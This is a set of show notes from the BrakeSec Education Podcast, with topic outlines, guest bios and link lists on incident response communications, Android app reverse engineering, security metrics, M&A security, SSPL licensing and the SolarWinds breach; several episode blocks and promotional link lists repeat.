BrakeSec Education Podcast

In this episode: knowing your audience - discussing the IR impact how did this happen? how deep do you want to tailor your potential discussion? Every level must be asking "what, when, why, how?", not just those in the trenches does the level of incident mean that communication scales accordingly? And much more! Dr. Catherine J. Ullman (@investigatorchi) Incident Response communications Reminders: Patreon Jeff T. just became a $2 patron! Accepted to CircleCityCon on IR communications! Bsides Rochester Security B-Sides Rochester Spoke at SeaSec meetups: Qualys Update on Accellion FTA Security Incident | Qualys Security Blog Security Advisory | SolarWinds Family Educational Rights and Privacy Act (FERPA) It's important to share necessary information with senior level people and higher ups, but is there a thing as 'oversharing'? How do you toe the line between oversharing and nothing at all? In higher Ed, are you beholden to different disclosure requirements than businesses? What is Server Side Request Forgery (SSRF)? | Acunetix 13 Beautiful Tools to Create Status Pages for your Business (geekflare.com) Laying communication groundwork Status pages (notifying users) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dr. Catherine J. Ullman (@investigatorchi) Incident Response communications Reminders: Patreon Jeff T. just became a $2 patron! Accepted to CircleCityCon on IR communications! Bsides Rochester Security B-Sides Rochester Spoke at SeaSec meetups: Qualys Update on Accellion FTA Security Incident | Qualys Security Blog Security Advisory | SolarWinds Family Educational Rights and Privacy Act (FERPA) It's important to share necessary information with senior level people and higher ups, but is there a thing as 'oversharing'? How do you toe the line between oversharing and nothing at all? In higher Ed, are you beholden to different disclosure requirements than businesses? What is Server Side Request Forgery (SSRF)? | Acunetix 13 Beautiful Tools to Create Status Pages for your Business (geekflare.com) Laying communication groundwork Status pages (notifying users) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

@thefluffy007 A Bay Area Native (Berkeley) I always tell people my computer journey started at 14, but it really started at 5th grade (have a good story to tell about this) Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0. Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math. Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again. Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer. Co-workers did not want me to test their code because I would always find bugs. Moved into penetration testing space. Always had an interest in mobile, but never did mobile development and decided it wasn't for me Became interested in bug bounties and noticed that mobile payouts were higher. At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking. Realized the barrier to entry was VERY (almost non-existent) low in Android as it's open source. Started to learn/expand mobile hacking on my own time The threat exposure is VERY high with mobile hacking. As you have a web app component, network component, and phone component. I always reference a slide from Secure Works. Link to YouTube Channel → thefluffy007 - YouTube thefluffy007 – A security researchers thoughts on all things security – web, mobile, and cloud The Mobile App Security Company | NowSecure owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub Rana Android Malware (reversinglabs.com) These 21 Android Apps Contain Malware | PCMag Android Tamer -Android Tamer The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd Android Debug Bridge (adb) | Android Developers Goal: discussing best practices and methods to reverse engineer Android applications Introduction to Java (w3schools.com) JavaScript Introduction (w3schools.com) Introduction to Python (w3schools.com) Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript, and Python, along with other languages) GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida) Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub Reverse-Engineering - YobiWiki Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. (ibotpeaches.github.io) GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator Background: **consider this a primer for any class you might teach, a teaser, if you will** Why do we want to be able to reverse engineer APKs and IPKs? Android APKS (Android Packages) holds the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they're proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code. What are some of the structures and files contained in APKs that are useful for ppl analyzing binaries? Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application. Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application. When testing apps for security, how easy is it to emulate security and physical controls if you're not on a handset? Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively. Are there ever any times you HAVE to use a handset? An app that tests something like Android's Safetynet and won't run without it? Do they ever want perf testing on their apps? Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions? When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope? How do progressive web apps differ than a more traditional app? Lab setup IntroToAndroidSecurity VM Android Emulator Tools to use Why use them? (free, full-featured) Setup and installation OS-specific tools? Tools used - Frida, Jadx-GUI

@thefluffy007 A Bay Area Native (Berkeley) I always tell people my computer journey started at 14, but it really started at 5th grade (have a good story to tell about this) Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0. Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math. Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again. Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer. Co-workers did not want me to test their code because I would always find bugs. Moved into penetration testing space. Always had an interest in mobile, but never did mobile development and decided it wasn't for me Became interested in bug bounties and noticed that mobile payouts were higher. At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking. Realized the barrier to entry was VERY (almost non-existent) low in Android as it's open source. Started to learn/expand mobile hacking on my own time The threat exposure is VERY high with mobile hacking. As you have a web app component, network component, and phone component. I always reference a slide from Secure Works. Link to YouTube Channel → thefluffy007 - YouTube thefluffy007 – A security researchers thoughts on all things security – web, mobile, and cloud The Mobile App Security Company | NowSecure owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub Rana Android Malware (reversinglabs.com) These 21 Android Apps Contain Malware | PCMag Android Tamer -Android Tamer The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd Android Debug Bridge (adb) | Android Developers Goal: discussing best practices and methods to reverse engineer Android applications Introduction to Java (w3schools.com) JavaScript Introduction (w3schools.com) Introduction to Python (w3schools.com) Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript, and Python, along with other languages) GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida) Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub Reverse-Engineering - YobiWiki Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. (ibotpeaches.github.io) GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator Background: **consider this a primer for any class you might teach, a teaser, if you will** Why do we want to be able to reverse engineer APKs and IPKs? Android APKS (Android Packages) holds the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they're proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code. What are some of the structures and files contained in APKs that are useful for ppl analyzing binaries? Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application. Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application. When testing apps for security, how easy is it to emulate security and physical controls if you're not on a handset? Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively. Are there ever any times you HAVE to use a handset? An app that tests something like Android's Safetynet and won't run without it? Do they ever want perf testing on their apps? Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions? When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope? How do progressive web apps differ than a more traditional app? Lab setup IntroToAndroidSecurity VM Android Emulator Tools to use Why use them? (free, full-featured) Setup and installation OS-specific tools? Tools used - Frida, Jadx-GUI

Links to discussed items: Yandex Employee Caught Selling Access to Users' Email Inboxes (thehackernews.com) Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple | Threatpost Google pitches security standards for 'critical' open-source projects | SC Media (scmagazine.com) Google's approach to secure software development and supply chain risk management | Google Cloud Blog https://vectr.io/ https://www.kitploit.com/2021/02/damn-vulnerable-graphql-application.html https://www.blumira.com/careers/?gh_jid=4000142004 sec evangelist @blumira Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Ronnie Watson (@secopsgeek) Youtube: watson infosec - YouTube watsoninfosec (Watsoninfosec) · GitHub Feel free to add anything you like Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform) GitHub - ossec/ossec-hids: OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. Implementing a Network Security Metrics Programs (giac.org) What to track. Some suggested metrics to start with: Number of Successful Logons – from security audits. Number of Unsuccessful Logons – from security audits. Number of Virus Infections during a given period. Number of incidents reported. Number of security policy violations during a given period. Number of policy exceptions during a given period. Percentage of expired passwords. Number of guessed passwords – use a password cracker to test passwords. Number of incidents. Cost of monitoring during a given period – use your time tracking system if you have one. 6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com) Metrics of Security (nist.gov) Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include "Is our network more secure today than it was before?" or "Have the changes of network configurations improved our security posture?" The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents. DNS over HTTPs DNS over HTTPS - Wikipedia

Ronnie Watson (@secopsgeek) Youtube: watson infosec - YouTube watsoninfosec (Watsoninfosec) · GitHub Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform) GitHub - ossec/ossec-hids: OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. Implementing a Network Security Metrics Programs (giac.org) What to track. Some suggested metrics to start with: Number of Successful Logons – from security audits. Number of Unsuccessful Logons – from security audits. Number of Virus Infections during a given period. Number of incidents reported. Number of security policy violations during a given period. Number of policy exceptions during a given period. Percentage of expired passwords. Number of guessed passwords – use a password cracker to test passwords. Number of incidents. Cost of monitoring during a given period – use your time tracking system if you have one. 6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com) Metrics of Security (nist.gov) Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include "Is our network more secure today than it was before?" or "Have the changes of network configurations improved our security posture?" The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents. DNS over HTTPs DNS over HTTPS - Wikipedia Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Discussion on Mergers and acquisitions processes On being acquired, but also if you're acquiring a company Best Practices Best Practices of Mergers and Acquisitions (workforce.com) Best Practices In Merger Integration - Institute for Mergers, Acquisitions and Alliances (IMAA) (imaa-institute.org) The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com) Security Considerations in the Merger/Acquisition Process (sans.org) The 10 steps to successful M&A integration | Bain & Company Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com) "We've been acquired by X!" First thing people think "oh no, what's gonna happen to me." Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Discussion on Mergers and acquisitions processes On being acquired, but also if you're acquiring a company Best Practices Best Practices of Mergers and Acquisitions (workforce.com) Best Practices In Merger Integration - Institute for Mergers, Acquisitions and Alliances (IMAA) (imaa-institute.org) The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com) Security Considerations in the Merger/Acquisition Process (sans.org) Women Unite Over CTF 3.0 (ittakesahuman.com) The 10 steps to successful M&A integration | Bain & Company Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com) "We've been acquired by X!" First thing people think "what's gonna happen to me." Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Secure RPC issue - Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (microsoft.com) Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center Elastic Search https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks "There are those who will point to the FAQ for the SSPL and claim that the license isn't interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it's their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk." Doubling down on open, Part II | Elastic Blog - license change affecting Elastic Search and Kibana MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org) Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com) @vmbrasseur: (1) VM (Vicky) Brasseur on Twitter: "With today's relicensing to #SSPL, Elasticsearch & Kibana are no longer #OpenSource but are instead business risks: https://t.co/XNx2EMLNfH" / Twitter (1) Adam Jacob on Twitter: "Yeah, come on - how can this be "doubling down on open"? Some true duplicity here. https://t.co/rlJVnLxYwP - we're taking two widely used, widely distributed, widely incorporated open source projects and making them no longer open source. But we're doubling down on open!" / Twitter [License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org) "We continue to believe that the SSPL complies with the Open Source Definition and the four essential software freedoms. However, based on its reception by the members of this list and the greater open source community, the community consensus required to support OSI approval does not currently appear to exist regarding the copyleft provision of SSPL. Thus, in order to be respectful of the time and efforts of the OSI board and this list's members, we are hereby withdrawing the SSPL from OSI consideration." (could be 'open-source', but negative feedback on mailing lists and elsewhere made the remove it from consideration from OSI) Open Source license requirements: The Open Source Definition | Open Source Initiative What does this mean? If you have products that utilize ElasticSearch/MongoDB/Kibana in some way, talk to your legal teams to find out if you need to divest your org from them. These are not 'opensource' licenses… they are 'source available' It might not affect your organization and moving to SSPL might be feasible. If your product makes any changes internally to ElasticSearch, Notable links JTNYDV - specifically the CIS docker hardening Twitter: @jtnydv Bug Detected in Linux Mint Virtual Keyboard by Two Kids - E Hacking News - Latest Hacker News and IT Security News https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html https://www.techradar.com/news/man-has-two-attempts-left-to-unlock-bitcoin-wallet-worth-dollar270-million https://www.linkedin.com/posts/amandaberlin_podcast-mentalhealth-neurodiversity-activity-6755910847148691456-Lms5 https://www.linkedin.com/posts/amandaberlin_swag-securitybreach-infosecurity-activity-6755884694501498880-yAck Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher N

Dream Doxxed: Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com) Def Noodles on Twitter: "STANS TAKING IT TOO FAR: Dream doxed after posting a picture of his kitchen on his 2nd Twitter account. Dream has not published statement about situation yet in his public accounts. https://t.co/QuKpIYRODQ" / Twitter Osint issues… found him by breadcrumbs and using zillow internal pics of his house. Craziness Password Guessing Used as a Weapon by SolarWinds Hackers to Breach Targets - E Hacking News - Latest Hacker News and IT Security News How to Use APIs (explained from scratch) (secjuice.com) Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

End of year podcast Blumeria sponsorship NEWS: IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News https://krypt3ia.wordpress.com/ - 16 december 2020 Microsoft flexing muscle to shutdown c2: Microsoft unleashes 'Death Star' on SolarWinds hackers in extraordinary response to breach - GeekWire Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com) FireEye, GoDaddy,and Microsoft create kill switch for SolarWinds backdoorSecurity Affairs US Gov has hacked: US government agencies hacked; Russia a possible culprit (apnews.com) Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc Not trying to spread FUD, but would infiltration by using FOSS tools be easier than Solarwinds? Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News System oriented programming - Cloud-Sliver (cloud-sliver.com) Google Cloud (over)Run: How a free trial experiment ended with a $72,000 bill overnight • The Register G'bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com) IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com) Vulnerabilities Found in Multiple GE Imaging Systems - Infosecurity Magazine (infosecurity-magazine.com) Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com) https://www.atlasobscura.com/places/encryption-lava-lamps - "The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet. " It's been the year of the business continuity program this year… and how agile yours is. --thoughts? Future? Bryan: Companies that are 'all in' on remote work will back track. Amanda: I think we'll see way more keep the wfh now that they realize it saves $$ heck out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

BrakeSec Sponsored Interview with Nathanael Iversen Questions, comments, and other content goes here: Illumio Nathanael Iversen BDS Podcast Messaging Topic: Overview of development and deployment of micro-segmentation Where does segmentation fit into your security strategy? Micro-segmentation is a preventive measure deployed to create and enforce access at the workload layer. It does not replace identity and access management (IAM), perimeter firewalls, or patching but complements such solutions. Because traditional network segmentation is done with network devices, it only works when the traffic passes through that control point. Micro-segmentation, on the other hand, shifts the enforcement point from the network onto the individual servers and hosts. The means that segmentation policy can be much more granular and can encompass all inbound and outbound traffic, not just the traffic leaving a network zone, VLAN, or environment. Micro-segmentation is a great deterrent for hackers. More organizations are implementing micro-segmentation as an essential part of a defense-in-depth strategy. According to a recent survey of over 300 IT professionals, 45% currently have a segmentation project or are planning one. The keys to a successful micro-segmentation deployment: As with any security control, it's important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly: Visibility with application context Scalable architecture Abstracted security policies Granular controls Consistent policy framework across your compute estate Integration with security ecosystem Preventative Cybersecurity There are three broad preventive security actions: First is controlling the ability to reach the device or target service via the network. Clearly, if you cannot even get to the sensitive data or application, then no amount of vulnerabilities will permit compromise. Often terms like firewall, access control lists (ACLs), VLANs, zones, and the like describe these capabilities. This function is generally implemented by the network team or a dedicated network security team. The second broad action available controls the ability to access a device, data or service once you get there. This covers the entire world of credentials, user accounts, permissions, authentication, authorization, tokens, API keys, etc. If you get to the front door of my house and it is locked, you can't gain access unless you have the right key. The third broad strategy addresses the fact that often malicious behavior exploits some bug or weakness. So, if one can remove vulnerable code, then in many cases, malicious intent can't be realized. This involves patching, replatforming applications to stronger platforms, doing code reviews, and more. Potential questions: What is micro-segmentation? How long has it been around? Can micro-segmentation be used in conjunction with other cybersecurity tools? Like firewalls? How does micro-segmentation operate in different environments? How does development and deployment differ in the cloud vs. on-prem? What does a successful micro-segmentation deployment look like? Tell us about the common challenges people face in their micro-segmentation projects. What misconceptions do people have about micro-segmentation? What is the difference between having a proactive vs. reactive security strategy? Can you explore the 'cost' of preventative cybersecurity in 2020? I.e., how much can your organization save by preventing breaches, vs. paying off ransomware attackers? Or losing customer trust via a public breach? What does micro-segmentation adoption look like as we head into the new year? What is the future of micro-segmentation? Segmentation of database areas? Logs?

https://www.hak4kidz.com/activities/cdcedu.html Online CTF training using Cisco's Workshop platform. They did something similar in Spring of 2020. There will be an online panel where kids can ask questions about information security. Occurs on December 12th. Check out the link for more info. Robert M. for upping his patreon to $5 Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com) @byt3bl33d3r (Marcello Salvati) @porchetta_ind (porchetta Industries) [email protected] Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors Github sponsors: GitHub Sponsors Introducing Sponsorware: How A Small Open Source Package Increased My Salary By $11k in Two Days | Caleb Porzio How is this different than shareware? "As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects." Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica (spent years supporting the app… the vitriol from 'unpaid customers' is deafening… Should be required reading for anyone wanting to open source anything.) [Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com) Business model for typical opensource projects. Where's the chain broken at? Devs who expect help/support for their project? "Many eyes make for less vulns" (LOL, sounds good, not 